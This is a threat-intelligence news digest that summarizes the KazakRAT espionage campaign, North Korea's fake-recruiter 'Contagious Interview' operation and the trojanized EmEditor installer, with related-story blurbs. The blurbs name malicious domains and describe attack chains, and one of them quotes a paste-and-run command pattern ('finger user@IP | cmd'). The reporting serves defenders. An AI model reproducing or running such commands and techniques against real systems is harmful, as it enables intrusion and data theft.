State-Linked Malware Campaigns Using Social Engineering and Trojanized Installers
Multiple reports detailed state-linked intrusion activity relying on social engineering and trusted delivery mechanisms to gain initial access and establish remote control. Researchers reported a suspected state-affiliated espionage operation targeting government and financial organizations in Kazakhstan and Afghanistan, built around a previously unreported Windows DLL implant dubbed KazakRAT delivered via malicious MSI installers and decoy documents (e.g., a fake Kazakh presidential letter and an Afghan provincial memo). The malware was described as relatively unsophisticated—unencrypted HTTP beaconing and minimal obfuscation—yet capable of host reconnaissance, file search/exfiltration, and downloading/executing additional payloads, enabling long-running access since at least 2022.
Separately, Insikt Group described North Korean operators (tracked as PurpleBravo) running the “Contagious Interview” campaign, using fake recruiter personas and weaponized “coding tests” hosted on platforms like GitHub to trick software developers into executing malware on corporate devices, supporting software supply-chain targeting. The toolset reportedly includes BeaverTail (JavaScript infostealer) and newly identified RATs PylangGhost and GolangGhost. In another supply-chain style incident, Trend research and an Emurasoft advisory reported the official EmEditor download being tampered with to serve a trojanized MSI whose CustomAction launched PowerShell to fetch staged payloads from lookalike domains (e.g., EmEditorjp[.]com, EmEditorgb[.]com, EmEditorde[.]com), followed by environment fingerprinting and geofencing checks—highlighting ongoing risk from compromised public software distribution channels.
Timeline
Jan 27, 2026
Researchers publicly disclose KazakRAT campaign and APT36 overlap
Researchers revealed the long-running KazakRAT espionage operation and noted overlaps with APT36/Transparent Tribe, including use of XploitSpy in related activity. While attribution remained unconfirmed, the disclosure established links in victimology and tooling patterns.
Jan 27, 2026
Researchers publicly disclose EmEditor supply-chain compromise
TrendAI Research reported the EmEditor supply-chain attack, detailing how the official installer was hijacked to distribute malware through attacker-controlled domains. The disclosure highlighted the risk to organizations downloading the software from the compromised official source.
Jan 27, 2026
Researchers publicly disclose Contagious Interview and PurpleBravo details
Insikt Group published findings on the North Korea-linked Contagious Interview campaign, linking PurpleBravo to large-scale targeting of more than 3,000 IPs and at least 20 victim organizations in AI, cryptocurrency, and financial services. The report also noted operational overlap with PurpleDelta, a network of fraudulent North Korean IT workers.
Jan 27, 2026
Emurasoft issues emergency advisory on tampered EmEditor download link
Emurasoft acknowledged that the official EmEditor download link may have been tampered with and warned users to verify installer integrity. Organizations were urged to investigate possible compromise and look for traffic to the identified malicious domains.
Jan 27, 2026
Researchers sinkhole a KazakRAT command-and-control domain
Investigators took over a key KazakRAT C2 domain after the threat actor failed to renew it, allowing them to sinkhole traffic and passively collect victim IP addresses. The telemetry reinforced that the campaign was targeting government and financial-sector roles, especially in Kazakhstan's Karaganda region.
Jan 27, 2026
Attackers launch Contagious Interview fake-job malware campaign
A North Korea-linked threat cluster tracked as PurpleBravo began targeting IT and software supply-chain personnel through fake recruiter personas, interviews, and weaponized coding tests hosted on GitHub. The campaign used BeaverTail for initial compromise and later deployed the newly identified PylangGhost and GolangGhost RATs against victims using corporate devices.
Dec 1, 2025
EmEditor malware campaign adds credential theft and lateral movement preparation
Analysis of the trojanized EmEditor installer revealed a multi-stage payload chain that performed host fingerprinting, geofencing, credential theft, defense evasion, and preparation for lateral movement. Researchers assessed the operators were likely of Russian or broader CIS origin based on geofence exclusions and observed tradecraft.
Dec 1, 2025
Trojanized EmEditor installer campaign surfaces on official download page
In late December 2025, attackers hijacked EmEditor's official download flow and served a malicious MSI installer in place of the legitimate software. The trojanized package used a modified MSI CustomAction to launch PowerShell, retrieve first-stage code, and pull additional modules from attacker-controlled domains.
Aug 1, 2022
KazakRAT espionage campaign begins targeting Kazakhstan and Afghanistan
A suspected state-affiliated espionage campaign using the previously unreported KazakRAT malware was active by at least August 2022, targeting government and financial entities in Kazakhstan and Afghanistan. The operation used tailored decoy documents and malicious MSI installers to deliver a DLL-based Windows RAT.
See the full picture in Mallory
Mallory subscribers get deeper analysis on every story, including:
Who’s affected and how
Deep-dive technical analysis
Actionable next steps for your team
IPs, domains, hashes, and more
Ask questions and take action on every story
Filter by topic, classification, timeframe
Get matching stories delivered automatically
Related Entities
Threat Actors
Affected Products
Sources
Related Stories
Social-engineering malware campaigns delivering remote-access trojans and backdoors
Recent reporting highlights multiple **social-engineering-driven malware delivery** efforts that culminate in remote access and persistent compromise. In South Korea, attackers distributed **counterfeit adult games** via popular “webhard” file-sharing services; victims received a ZIP containing a decoy `Game.exe` launcher that stages additional components (`Data1.Pak`, `Data2.Pak`, `Data3.Pak`) and ultimately injects **QuasarRAT** (aka **xRAT**), enabling host profiling, keylogging, and unauthorized file transfer. The execution chain included masqueraded artifacts such as `GoogleUpdate.exe` and `WinUpdate.db`, with AES used to decrypt/extract shellcode prior to privilege escalation and RAT injection. Separately, a spear-phishing campaign weaponized news about a purported **Nicolás Maduro arrest** to deliver a **backdoor**: emails carried a ZIP with a lure executable (`Maduro to be taken to New York.exe`) alongside a malicious DLL (`kuguo.dll`) that abuses a legitimate KuGuo binary for execution. Post-run behavior included replication to `C:\ProgramData\Technology360NB`, persistence via an auto-start renamed binary (`DataTechnology.exe`), and C2 beaconing for tasking and configuration updates; researchers noted tradecraft consistent with **Mustang Panda** but said attribution was not yet confirmed. A separate research note described **GravityRAT** reemerging as a multi-platform RAT with expanded **Android** targeting (in addition to Windows/macOS), emphasizing mobile endpoints as increasingly high-value targets for data theft and persistent access, though it did not describe the same specific campaigns as the Windows-focused lures above.
1 months ago
Windows Malware Campaigns Using Social Engineering and Legitimate Platforms to Deliver RATs, Stealers, and Proxyware
Multiple research reports detailed **Windows-focused malware delivery chains** that rely on social engineering and abuse of legitimate services to blend into normal enterprise traffic. FortiGuard Labs described a **multi-stage campaign targeting users in Russia** that starts with business-themed decoy documents and scripts, then escalates to security-control bypass and surveillance before deploying **Amnesia RAT** and ultimately **ransomware** with widespread file encryption. A notable technique in that intrusion is the abuse of **Defendnot** (a Windows Security Center trust-model research tool) to **disable Microsoft Defender**, while payloads are hosted modularly across public cloud services (e.g., **GitHub** for scripts and **Dropbox** for binaries) to improve resilience and complicate takedowns. Separately, ReliaQuest reported attackers using **LinkedIn private messages** to build trust with targets and deliver a **WinRAR SFX** that triggers **DLL sideloading** via a legitimate PDF reader, then establishes persistence (Registry `Run` key) and executes **Base64-encoded shellcode in-memory** to load a RAT-like payload. Trend Micro and Koi Security documented **Evelyn Stealer**, which weaponizes **malicious VS Code extensions** to drop a downloader DLL (e.g., `Lightshot.dll`), run hidden PowerShell to fetch `runtime.exe`, and inject the stealer into `grpconv.exe`, exfiltrating data (credentials, cookies, wallets, screenshots, Wi‑Fi credentials) to `server09.mentality[.]cloud` over FTP. AhnLab ASEC also reported **proxyjacking** activity in South Korea attributed to **Larva‑25012**, distributing **proxyware disguised as a Notepad++ installer** and evolving evasion (e.g., injecting into Windows Explorer and using Python-based loaders) to monetize victims’ bandwidth via unauthorized proxyware installation.
1 months ago
Malware Delivery via Social Engineering: Phishing Lures, Fake Browser Alerts, and Paste-and-Run Payloads
Multiple threat reports describe **social-engineering-driven malware delivery** leading to remote access and follow-on payload deployment. Fortinet observed a **multi-stage phishing campaign targeting users in Russia** that delivers **Amnesia RAT** and ransomware via business-themed decoy documents and a malicious `.lnk` shortcut using a double extension (e.g., `*.txt.lnk`). The infection chain uses public cloud services for staging—**GitHub** for scripts and **Dropbox** for binary payloads—and abuses **defendnot** to trick Windows into believing a third-party AV is installed, effectively disabling **Microsoft Defender** before later-stage execution. Separately, Huntress attributed activity to **KongTuke**, which uses **malicious browser extensions** to display fake “browser crash” security alerts (“**CrashFix**”) that pressure users into running attacker-provided commands, and also deploys a Python RAT dubbed **ModeloRAT**. ModeloRAT is described as heavily obfuscated, using **Windows Registry** persistence and **RC4**-encrypted communications, with the ability to deliver additional payloads (DLLs, executables, scripts). Red Canary’s January intelligence update highlights **Scarlet Goldfinch** activity using **paste-and-run** lures and a notable technique of using the Windows `finger` client to pull remote content (e.g., `finger user@IP | cmd`), followed by `curl` download of an archive masquerading as a PDF and extraction via `tar -xf`, culminating in **Remcos** (and sometimes **NetSupport**) delivered via **DLL sideloading**.
1 months ago